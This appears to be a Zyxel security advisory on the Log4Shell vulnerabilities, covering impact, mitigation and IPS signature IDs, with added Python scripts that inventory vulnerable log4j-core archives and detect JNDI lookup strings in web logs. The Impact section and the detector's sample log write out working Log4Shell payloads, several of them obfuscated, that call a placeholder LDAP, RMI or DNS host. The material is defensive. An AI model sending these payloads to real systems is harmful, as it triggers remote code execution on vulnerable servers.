Guard against Log4Shell

Vulnerable log4j Package

Log4j is an open-source library that is widely used for logging in Java applications. A remote code execution vulnerability, CVE-2021-44228 ("Log4Shell"), was found in Log4j 2 versions 2.0-beta9 through 2.14.1. A second vulnerability, CVE-2021-45046, was subsequently found to affect the 2.15.0 fix as well, so we recommend updating to version 2.17.0 or later. The flaw lets an attacker obtain a remote shell simply by getting the application to log a specially crafted string.

Impact

This vulnerability received the highest possible CVSS score (10.0), because the log4j library is so widely deployed and the flaw can be exploited remotely without authentication. If the server is vulnerable, an attacker only has to get a string such as ${jndi:ldap://example.com/a} written to a log (for example in a User-Agent header or a form field); log4j then performs the JNDI lookup, retrieves attacker-controlled content from the named server and executes it, giving the attacker a shell on the host. Once the host is compromised, it can be turned into a bot, used for cryptocurrency mining, or have its files encrypted by ransomware.

Products Protecting Against Log4Shell

Zyxel is aware of the remote code execution (RCE) vulnerabilities in Apache Log4j and confirms that none of its security products are affected [1]. Zyxel ATP/USG FLEX Series firewalls provide multiple layers of protection to help defend against this attack.

Mitigation

On the host: update to the latest version of Apache Log4j (2.17.0 or later). Check every copy of log4j-core on the system, including copies bundled inside application archives, not only the one your package manager knows about.
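As an added example (not Zyxel's own tooling), the following Python script checks the host-side recommendation above: it walks a directory tree, finds every Log4j 2 core archive by its package path, including copies nested inside WAR/EAR files, reads the version from the JAR manifest or the file name, and flags anything below 2.17.0. The build_fake_archive fixture and the version strings in the demo are constructed test data, not real Log4j builds.

```python
"""Inventory log4j-core archives under a directory and flag versions below 2.17.0.

Added example for this page, not Zyxel's tooling. Log4j 2 core is recognised by
its package path rather than the file name, the version is read from
META-INF/MANIFEST.MF with the file name as fallback, and archives nested inside
WAR/EAR/JAR files are inspected in memory. An unknown version counts as vulnerable."""
import io
import os
import re
import zipfile
from typing import Dict, Iterator, List, Optional, Tuple

Version = Tuple[int, int, int]
FIXED_VERSION: Version = (2, 17, 0)      # the page's recommended minimum
CORE_PACKAGE = "org/apache/logging/log4j/core/"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
NAME_RE = re.compile(r"log4j-core-(\d+(?:\.\d+)*)", re.IGNORECASE)
MAX_NESTING = 3                          # bound recursion into nested archives


def parse_version(text: str) -> Optional[Version]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); no digits -> None."""
    m = re.match(r"\s*(\d+)(?:\.(\d+))?(?:\.(\d+))?", text)
    if not m:
        return None
    major, minor, patch = (int(g) if g else 0 for g in m.groups())
    return (major, minor, patch)


def version_from_archive(zf: zipfile.ZipFile, label: str) -> Optional[Version]:
    """Prefer the manifest (it survives a renamed file); fall back to the name."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        manifest = ""
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key.strip() in ("Implementation-Version", "Bundle-Version"):
            version = parse_version(value)
            if version:
                return version
    m = NAME_RE.search(os.path.basename(label.split("!/")[-1]))
    return parse_version(m.group(1)) if m else None


def is_vulnerable(version: Optional[Version]) -> bool:
    return version is None or version < FIXED_VERSION


def inspect_archive(data: bytes, label: str, depth: int = 0) -> Iterator[Tuple[str, Optional[Version]]]:
    """Yield (label, version) for each log4j-core in `data`; nested archives get
    labels of the form 'app.war!/WEB-INF/lib/log4j-core-2.14.1.jar'."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        if any(n.startswith(CORE_PACKAGE) for n in names):
            yield label, version_from_archive(zf, label)
        if depth < MAX_NESTING:
            for n in names:
                if n.lower().endswith(ARCHIVE_EXT):
                    yield from inspect_archive(zf.read(n), f"{label}!/{n}", depth + 1)


def scan_tree(root: str) -> List[Tuple[str, Optional[Version], bool]]:
    """(label, version, vulnerable?) for every log4j-core found under `root`."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    data = fh.read()
                for label, version in inspect_archive(data, path):
                    findings.append((label, version, is_vulnerable(version)))
    return findings


def build_fake_archive(version: Optional[str] = None, core: bool = True,
                       nested: Optional[Dict[str, bytes]] = None) -> bytes:
    """Constructed fixture: a minimal zip shaped like log4j-core (or like a WAR
    when core=False). Not a real Log4j build; for the demo and tests only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version is not None:
            zf.writestr("META-INF/MANIFEST.MF",
                        f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if core:
            zf.writestr(CORE_PACKAGE + "lookup/JndiLookup.class", b"\xca\xfe\xba\xbe")
        for name, blob in (nested or {}).items():
            zf.writestr(name, blob)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                # real scan: pass the directory to walk
        for label, version, bad in scan_tree(sys.argv[1]):
            print("VULNERABLE" if bad else "ok        ", label, version)
    else:                                # demo on the constructed fixture
        war = build_fake_archive(core=False, nested={
            "WEB-INF/lib/log4j-core-2.14.1.jar": build_fake_archive("2.14.1")})
        for label, version in inspect_archive(war, "app.war"):
            print("VULNERABLE" if is_vulnerable(version) else "ok        ", label, version)
```

Run it with the directory to scan as its only argument; with no argument it demonstrates the nested case on the constructed fixture. An undeterminable version is reported as vulnerable on purpose: a JAR with a stripped manifest and a renamed file is exactly the copy an inventory tends to miss.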

On the network:

  • To reduce the attack surface, do not expose vulnerable applications to the Internet unless it is absolutely necessary; use a VPN for remote access to them instead.
  • Update to the latest IPS signature set and enable IPS to protect your hosts. If the host serves traffic over SSL/TLS, also enable SSL inspection so the payload can be detected inside encrypted connections. When the attack comes from a known malicious IP address, the IP reputation feature blocks it.
  • Enabling the DNS Filter, URL Filter, Content Filter, Anti-Virus and Sandbox features can also break the attack chain (the outbound JNDI/LDAP connection and the download of the second-stage payload) and prevent further infection.
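The IPS signatures referred to above match the lookup string on the wire. The following Python script, an added example rather than Zyxel's signature logic, shows the same detection run over constructed web-server access-log lines, illustrating the attack string from the Impact section together with the nested-lookup (${${lower:j}ndi:...}, ${::-j}) and URL-encoded obfuscations that defeat a naive search for the literal ${jndi:. All log lines and IP addresses below are constructed sample data.

```python
"""Detect Log4Shell (CVE-2021-44228 / CVE-2021-45046) JNDI lookup strings in
web-server log lines, including nested-lookup and URL-encoded obfuscation.

Added example for this page, not Zyxel's IPS signatures. It reproduces the part
of Log4j's ${...} substitution that attackers abuse to hide the word "jndi"
(':-' default values, ${lower:x}, ${upper:x}), so that a substring match on
"${jndi:" is applied to the payload as Log4j would see it."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# innermost ${...} (no further ${ or } inside); Log4j resolves these first
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# the JNDI lookup itself, capturing its scheme (ldap, ldaps, rmi, dns, iiop, ...)
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)
MAX_ROUNDS = 64


def resolve_lookup(body: str) -> str:
    """Resolve one innermost lookup body the way Log4j's substitutor would for
    the lookups seen in obfuscated payloads."""
    if ":-" in body:                       # ${env:NaN:-j} or ${::-j} -> default "j"
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":                  # ${lower:J} -> "j"
        return arg.lower()
    if prefix == "upper":                  # ${upper:j} -> "J"
        return arg.upper()
    return arg                             # heuristic: other lookups -> their argument


def normalize(text: str) -> str:
    """URL-decode (repeatedly, for double encoding), then collapse nested lookups
    until a JNDI lookup is exposed or nothing is left; bounded so a pathological
    line cannot spin."""
    prev = None
    while prev != text:
        prev, text = text, unquote(text)
    for _ in range(MAX_ROUNDS):
        if JNDI.search(text):
            break
        new = INNER_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text, count=1)
        if new == text:
            break
        text = new
    return text


def extract_lookup(text: str, start: int) -> str:
    """Return the ${...} expression beginning at `start`, matching braces."""
    depth = 0
    for i in range(start, len(text)):
        if text.startswith("${", i):
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]


def detect(line: str) -> Optional[Dict[str, str]]:
    """{'scheme', 'payload'} if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "payload": extract_lookup(norm, m.start())}


def scan(lines: List[str]) -> List[Tuple[int, Dict[str, str]]]:
    """(1-based line number, finding) for every line containing a payload."""
    findings = []
    for number, line in enumerate(lines, 1):
        hit = detect(line)
        if hit:
            findings.append((number, hit))
    return findings


# Constructed access-log sample: five attack variants and one benign request.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Dec/2021:13:37:00 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:13:37:01 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:37:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.23:1099/x}"',
    '10.0.0.10 - - [10/Dec/2021:13:37:03 +0000] '
    '"GET /?x=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.23%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.11 - - [10/Dec/2021:13:37:04 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"',
    '10.0.0.12 - - [10/Dec/2021:13:37:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.23:1389/b}"',
]

if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG):
        print(f"line {number}: scheme={hit['scheme']} payload={hit['payload']}")
```

The normalization step is the point: each obfuscated variant collapses to the same ${jndi:scheme://host/path} form before the match runs, and the scheme is reported separately because ldap, rmi and dns payloads imply different outbound connections to block or hunt for.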

Please refer to the following signature information.

ATP/USG FLEX series (signature version v4.0.x.20211217.0):

  • Signature IDs 131026, 131027 and 131028 cover CVE-2021-44228.
  • Signature IDs 131029 and 131030 cover CVE-2021-45046.

Reference

[1] Zyxel security advisory for Apache Log4j RCE vulnerabilities